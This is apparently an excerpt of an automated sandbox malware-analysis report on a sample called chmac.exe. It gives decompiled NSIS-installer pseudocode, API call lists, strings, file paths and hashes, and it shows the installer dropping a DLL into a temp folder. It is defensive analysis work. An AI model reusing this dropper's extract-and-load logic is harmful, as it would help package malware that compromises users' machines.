0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403838
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x00403685
0x00403688
0x0040368d
0x00403696
0x0040369a
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(pzusn,00000000,00000000,00000000,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,pzusn,00000000,00000000,00000000,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(pzusn), ref: 004036DD
LoadImageA.USER32 ref: 00403726

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

@6B, xrefs: 00403735
pzusn, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
RichEd20, xrefs: 004037FC
.DEFAULT\Control Panel\International, xrefs: 0040363F
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 004035EF
C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
RichEdit, xrefs: 00403823
RichEdit20A, xrefs: 00403814, 0040381A
1033, xrefs: 00403603, 0040364F
.exe, xrefs: 004036CC
RichEd32, xrefs: 00403807
_Nb, xrefs: 0040377C, 00403781

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$pzusn
API String ID: 914957316-3925536986
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\hardz\\AppData\\Roaming\\dihsw", "C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\AppData\\Roaming\\dihsw"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0x62200
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x62200
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x4d9a0
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x62200
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x62200
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x3e9c5
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x41253
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402c69
0x00402c6c
0x00402c86
0x00402c8b
0x00402c9e
0x00402ca3
0x00402ca9
0x00000000
0x00402cab
0x00402cbc
0x00402ccd
0x00402cd4
0x00402cda
0x00402cdc
0x00402ce1
0x00402ce3
0x00402dd3
0x00402dd5
0x00402dda
0x00402de1
0x00000000
0x00000000
0x00402de7
0x00402dea
0x00402e16
0x00402e1b
0x00402e26
0x00402e28
0x00402e39
0x00402e54
0x00402e5a
0x00402e5d
0x00402e62
0x00402e78
0x00402e81
0x00402e91
0x00402ea3
0x00402ea8
0x00402ead
0x00402eb0
0x00402eb9
0x00402ebd
0x00402ec5
0x00402eca
0x00402ecc
0x00402ecc
0x00402ecc
0x00402ed4
0x00402ed4
0x00402ed7
0x00402ed8
0x00402ed8
0x00402edb
0x00402edd
0x00402edd
0x00402edd
0x00402ee0
0x00402ee7
0x00402ef3
0x00402ef8
0x00000000
0x00402ef8
0x00000000
0x00402eb0
0x00000000
0x00402e64
0x00402df2
0x00402dfd
0x00402e02
0x00402e04
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402ce9
0x00402ce9
0x00402ce9
0x00402cee
0x00402cf2
0x00402cf9
0x00402cfe
0x00402d00
0x00402d02
0x00402d02
0x00402d0a
0x00402d0f
0x00402d11
0x00402e70
0x00402eb2
0x00000000
0x00402eb2
0x00402d17
0x00402d1d
0x00402d9d
0x00402da1
0x00402da4
0x00402da9
0x00000000
0x00402da1
0x00402d2a
0x00402d2f
0x00402d32
0x00402d37
0x00000000
0x00000000
0x00402d39
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d63
0x00402d6c
0x00402d72
0x00402d75
0x00402d77
0x00402d7d
0x00000000
0x00000000
0x00402d83
0x00402d87
0x00402d8f
0x00402d8f
0x00402d92
0x00402d95
0x00402d97
0x00402d99
0x00402d99
0x00000000
0x00402d97
0x00402d89
0x00402d8d
0x00000000
0x00000000
0x00000000
0x00402daa
0x00402daa
0x00402db0
0x00402dc0
0x00402dc0
0x00402dc3
0x00402dc9
0x00402dcb
0x00402dcb
0x00000000
0x00402ce9

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

C:\Users\user\AppData\Roaming\dihsw, xrefs: 00402CB6, 00402CBB, 00402CC1
Inst, xrefs: 00402D42
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
Null, xrefs: 00402D54
Error launching installer, xrefs: 00402CAB
soft, xrefs: 00402D4B
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00402C68
C:\Users\user\AppData\Roaming\dihsw\chmac.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\dihsw$C:\Users\user\AppData\Roaming\dihsw\chmac.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3895572823
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

APIs

lstrcatA.KERNEL32(00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,pzusn,pzusn,00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,rrvbrezgsbt Setup,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

pzusn, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll, xrefs: 00401801, 0040181D
C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp, xrefs: 0040177E, 004017ED, 0040180B
C:\Users\user\AppData\Local\Temp, xrefs: 00401761

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp$C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll$pzusn
API String ID: 1941528284-3979043672
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x6a7d
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

0x00402f06
0x00402f10
0x00402f12
0x00402f19
0x00402f1d
0x00402f28
0x00402f28
0x00402f30
0x00402f32
0x00402f39
0x00402f55
0x00402f59
0x00403022
0x00403022
0x00000000
0x00402f68
0x00402f6b
0x00402f71
0x00402f78
0x00402f7b
0x00402f84
0x00402ff1
0x00402ff7
0x00402ff9
0x00402ff9
0x0040300b
0x0040300f
0x00000000
0x00403011
0x00403011
0x00403014
0x0040301a
0x00000000
0x0040301a
0x00402f86
0x00402f89
0x0040301d
0x0040301d
0x00402f8f
0x00402f94
0x00402f94
0x00402f9c
0x00402f9e
0x00402f9e
0x00402faf
0x00402fb3
0x00000000
0x00000000
0x00402fc7
0x00402fcf
0x00402fed
0x00403024
0x00403024
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdc
0x00402fdf
0x00402fe9
0x00000000
0x00402feb
0x00000000
0x00402feb
0x00402fe9
0x00000000
0x00402fcf
0x00000000
0x00402f94
0x00402f89
0x00402f84
0x00402f7b
0x00402f59
0x00403025
0x00403029

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,000621E4), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,000621E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,000621E4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,000621E4), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,000621E4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,000621E4), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$Read$PointerWrite
